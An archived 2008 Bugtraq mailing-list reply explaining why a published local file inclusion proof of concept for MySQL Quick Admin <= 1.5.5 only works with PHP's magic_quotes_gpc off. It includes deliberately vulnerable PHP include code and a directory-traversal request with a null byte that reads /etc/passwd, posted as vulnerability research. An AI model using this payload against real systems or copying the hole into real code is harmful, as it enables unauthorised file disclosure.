Re: Doubt in MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability POC posted on milworm

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Doubt in MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability POC posted on milworm
From: g30rg3_x <g30rg3x@xxxxxxxxx>
Date: Fri, 17 Oct 2008 11:30:38 -0500
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to :subject:in-reply-to:mime-version:content-type :content-transfer-encoding:content-disposition:references; bh=wC/AnSpbqOCrIQYB1npLE9hUbM0lk+kJmi8nAxTfFdI=; b=CE2Icr4hpdI+LDXYmFkhbhCE4eBecXWO/CZBznudgGFCqnbXdLjbeEhKFlGI9+BU/F XHdEIzY2SuqlFVMRUfyO8NXVgo6lJUy3kXHzWkm1urHBVhDu6JnzantcFWCe1oNTB8IE LY+0ipHU0RgtAPU2g+WhwVeEhT9RZCROyEdYE=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version :content-type:content-transfer-encoding:content-disposition :references; b=eXieY+7m8cXb6G/d6TqU9E/4oiteuOo9GvFPwF6xc06eWPrZ3dm5rXpyQ/m0wvdJtP A1Q9zL1qYPXRo2TXuB7fdQhHRh7F7mETJhgvK4Ji3xYlHinzlbIZfF6dj1msLd/Yivl+ wxxhks6cgZ+DLXoSuRwWJ4czjeoLvRegfWAkY=
In-reply-to: <d5d5430f0810170924g67674dcbme985f03870b0baee@xxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <200810170504.m9H54CAW016624@xxxxxxxxxxxxxxxxxxxxxx> <d5d5430f0810170924g67674dcbme985f03870b0baee@xxxxxxxxxxxxxx>

Hi,

It will only work if php have magic_quotes_gpc off...
For testing/research purpose you can emulated that enviroment using
stripslashes in your vuln code:
<?php
include("lang/".stripslashes($_GET[filename])."/lang.php");
?>

And then call for the LFI
GET /vulnerable php?filename=../../../../../../../../../../etc/passwd%00

Reference: 
http://www.php.net/manual/en/info.configuration.php#ini.magic-quotes-gpc

Regards

2008/10/17 <vinodsharma.mimit@xxxxxxxxx>
>
> Greetings All,
>
>
> I am trying to reproduce the issue, but php is reporting some error:
> like fail to open lang/../../../../../../../../../../etc/passwd%00; 
> path=//lang.php.
>
> vulnerable code is:
>
> include("lang/".$_SESSION['language']."/lang.php");
>
> exploit is: ../../../../../../../../../../etc/passwd%00; path=/ as the value 
> of vulnerable paramter.
>
> exploit link is:http://milw0rm.com/exploits/6641
>
> After observing this error i thought there must some issue with the 
> application, so created a vulnerable php program whose details are:
>
>
> <?php
>
> include("lang/".$_GET[filename]."/lang.php");
>
> ?>
>
>
> Then i send a GET a request:
>
> GET /vulnerable 
> php?filename=lang/../../../../../../../../../../etc/passwd%00; path=/
>
> still, i am observing same error.
>
> This is happening because inside include function, there is an additon of  
> /lang.php after the vulnerable parameter value in both case.
>
> I am not able to understand how the author manage to view the contents of 
> /etc/passwd by this method.
>
> please help me out.
>
> Thanks in advance.
-- 
_________________________
             g30rg3_x

References:
- Doubt in MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability POC posted on milworm
  - From: vinodsharma . mimit

Prev by Date: flashchat severe bug
Next by Date: Re: MS OWA 2003 Redirection Vulnerability - [MSRC 7368br]
Previous by thread: Doubt in MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability POC posted on milworm
Next by thread: flashchat severe bug
Index(es):
- Date
- Thread